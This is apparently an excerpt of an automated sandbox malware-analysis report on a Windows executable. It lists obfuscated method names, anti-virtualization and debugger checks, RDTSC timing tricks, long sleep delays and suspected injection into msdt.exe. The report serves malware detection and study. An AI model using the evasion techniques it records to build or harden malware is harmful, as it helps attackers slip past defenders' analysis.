Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, kZKWDRIFgoibh1hb2T.cs	High entropy of concatenated method names: 'ToString', 'z8N4aeZC4f', 'sm54B0PkF1', 'Jau4uc1jOy', 'MEa4etyCDG', 'Q1F4VlCy56', 'VZP4rdcIu4', 'H5G45PqSR7', 'xnV4jyvSsD', 'P5w4sKOVHw'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, Ek4LhktCeUZ4vOf7Ua.cs	High entropy of concatenated method names: 'hEXMdybeRd', 'TdjMo19niM', 'VnpMyvPWr9', 'r8WMk8fw89', 'vTTMpMUjh1', 'i0tM478XTt', 'H61MnWHv4R', 'K3fMmqfnxd', 'BDEMhwmJVf', 'b1FM2f9ZmF'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, pocZvdWaYcBDH0pnRC.cs	High entropy of concatenated method names: 'e2WIyxLImo', 'wQtIkNaHH0', 'xkoItbKgxl', 'GyiIB6R5cf', 'kjvIeJvYjr', 'PYKIVIX4vU', 'piqI5a4yvv', 'u4AIjAdES3', 'vWyI882UV9', 'AnqIaxYNVf'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, i4UKlxTbGliEA9DbaS.cs	High entropy of concatenated method names: 'QHchSwSjwi', 'skJhbk9wQp', 'nx8hih9ELx', 'HRYhNAOsGY', 'MwxhWoHpmC', 'bfehv3MNqx', 'lw9hKfyhmg', 'miWmgAl2U9', 'KInmDmGLsu', 'zfkmY2tplv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, QWExWLAqoGuZC75pehx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gHQ2cDU1Mg', 'hdy29JQByg', 'liQ21Q157d', 'o7d2UHsmkO', 'Xk02ZcZjn5', 'iFf20V2dfw', 'HfI2gPvV6r'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, QdNndQQ6nZ5EJDtnt1.cs	High entropy of concatenated method names: 'XGLWcmVP03', 'q1AW9O8PmB', 'n5lW17bxna', 'mNXWUSxLpE', 'lgHWZV0Nro', 'OkZW0ecwnx', 'HjBWgfP61l', 'PhNWDqX4rW', 'B0iWYp8Q3q', 'giwW6gFBfv'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, ktsjOqgCZu1GFFowlH.cs	High entropy of concatenated method names: 'MJnmtHT1Eq', 'FGRmBsLcdj', 'uQcmuD8ItA', 'KSamegy3V9', 'ztrmc0WvyS', 'fOGmVoLmTu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, WXrH4jVeKlucQK3169.cs	High entropy of concatenated method names: 'SELXO9ywk', 'TiZdl4BXI', 'hvVoagmbT', 'JumAQmALo', 'ns7kAGc1w', 's89E6F5B5', 'h4ZvHTIxB0TlueTR65', 'sfTDkQXVfeHdYw1hVl', 'G6CmgMdXj', 'nhJ2Jk5DJ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, FBTy3x8mprisgqbcUr.cs	High entropy of concatenated method names: 'bNCnDsop60', 'KHIn6lR7dR', 'uiWmTPrr1J', 'z6YmSceVt0', 'WKfnaeYlVx', 'D80nLVpJEC', 'A91nQIDkel', 'jWYncWn5Dt', 'LhFn9usQar', 'YvUn1XBmWC'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, YaIgQIyAUXnF75o8tN.cs	High entropy of concatenated method names: 'Aw4mN4bEYN', 'd3NmWLfbwr', 'F8pmMyFJZS', 'w8EmvjXKvw', 'SxXmKCfb6p', 'YIdmfUsHPM', 'PVHmxCMiCs', 'Km2mqgBNkS', 'DMXm7shkCG', 'xfTmFE21gZ'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, VBD99jHbNBN6seWpOy.cs	High entropy of concatenated method names: 'Dispose', 'sEuSYB5Cf2', 's16GBKj9IJ', 'doMHHGdMq3', 'Qw9S6B4tWJ', 'f8ySzbBWGy', 'ProcessDialogKey', 'Hm5GTlqf2e', 'eoLGSlCGZe', 'J77GGe8KcY'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, P1L7kyMMcEp8en6UhP.cs	High entropy of concatenated method names: 'zRiK1IGB9f', 'PA7KUCK26n', 'wVmKZ1APG3', 'ToString', 'XpxK0Robnm', 'vo4KgualDF', 'E27BHysRRy7McdrhL9I', 'CxShFWsrvV6YGvsAXbM'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, g2Zqnh36w0L7u7l6kJ.cs	High entropy of concatenated method names: 'qk5SfQ5AqH', 'RGUSxirRrN', 'RVwS7HvruL', 'BnFSFWtEeK', 'bbmSprcDb2', 'uRuS49SRSO', 'bwyrDYplvcPytTLjoN', 'ARfBeN1UyL5mDnReuL', 'cNeSS4iFjJ', 'hCNSbkry63'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, bS4Vc8AV0HcgkuQItZG.cs	High entropy of concatenated method names: 'Wkk2JDYcLU', 'tiB2RFUT8I', 'gSw2X2XGsZ', 'sDa9pB7ds4VmovDFeMM', 'KInGwJ7Fg4WQN3TCxOF', 'kvxq6f7p2tScaSYQ9oc', 'sl83bw71f25LExvBtxO'
Source: 0.2.mQY9ka5sW6hv2Ri.exe.79d0000.9.raw.unpack, xavLmCzdnYGj8CDZxw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MuahIjLKFc', 'rDWhppcb4S', 'hv0h4RdxLN', 'nCyhnD3Djk', 'sI8hmiLiyk', 'UY5hh3NOVy', 'SI9h2aotwA'

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: mQY9ka5sW6hv2Ri.exe PID: 6912, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 809904 second address: 80990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 809B7E second address: 809B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 2B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 7A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 8A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 8CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Memory allocated: 9CF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6094	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3839	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 868	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Window / User API: threadDelayed 9839	Jump to behavior

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\msdt.exe	API coverage: 0.8 %

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe TID: 6956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7112	Thread sleep time: -12188000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7112	Thread sleep time: -7678000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B60A8 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,GetProcessHeap,HeapAlloc,GetLastError,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008B60A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A602D GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,GetProcessHeap,HeapFree,	6_2_008A602D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A1B92 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A1B92
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A4CB6 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A4CB6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A5C20 memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,CloseHandle,FindFirstFileW,_wcsicmp,_wcsicmp,GetFileAttributesW,SetFileAttributesW,GetLastError,GetFileAttributesW,SetFileAttributesW,GetLastError,DeleteFileW,CreateFileW,GetLastError,CloseHandle,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008A5C20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B743A memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,CopyFileW,GetLastError,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008B743A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A4EDC memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A4EDC

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000005.00000000.1666578565.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000005.00000002.4093721221.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000005.00000002.4095689522.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000005.00000003.3426649414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000005.00000000.1666578565.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000005.00000002.4091496578.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000005.00000003.3426649414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.1666578565.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000005.00000002.4095689522.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000005.00000000.1665871823.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1665871823.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.1666578565.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000005.00000003.3106253540.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4093721221.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000005.00000002.4091496578.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000005.00000000.1665871823.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000005.00000002.4091496578.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Code function: 4_2_0040ACF0 LdrLoadDll,

4_2_0040ACF0

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_00890FA2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

6_2_00890FA2

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov eax, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123E10E mov ecx, dword ptr fs:[00000030h]	4_2_0123E10E
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01250115 mov eax, dword ptr fs:[00000030h]	4_2_01250115
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_011C0124 mov eax, dword ptr fs:[00000030h]	4_2_011C0124
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123A118 mov ecx, dword ptr fs:[00000030h]	4_2_0123A118
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]	4_2_0123A118
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]	4_2_0123A118
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0123A118 mov eax, dword ptr fs:[00000030h]	4_2_0123A118
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264164 mov eax, dword ptr fs:[00000030h]	4_2_01264164
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01264164 mov eax, dword ptr fs:[00000030h]	4_2_01264164
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196154 mov eax, dword ptr fs:[00000030h]	4_2_01196154
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01196154 mov eax, dword ptr fs:[00000030h]	4_2_01196154
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118C156 mov eax, dword ptr fs:[00000030h]	4_2_0118C156
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]	4_2_01224144
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]	4_2_01224144
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01224144 mov ecx, dword ptr fs:[00000030h]	4_2_01224144
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]	4_2_01224144
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01224144 mov eax, dword ptr fs:[00000030h]	4_2_01224144
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_01228158 mov eax, dword ptr fs:[00000030h]	4_2_01228158
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]	4_2_0118A197
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]	4_2_0118A197
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4_2_0118A197 mov eax, dword ptr fs:[00000030h]	4_2_0118A197
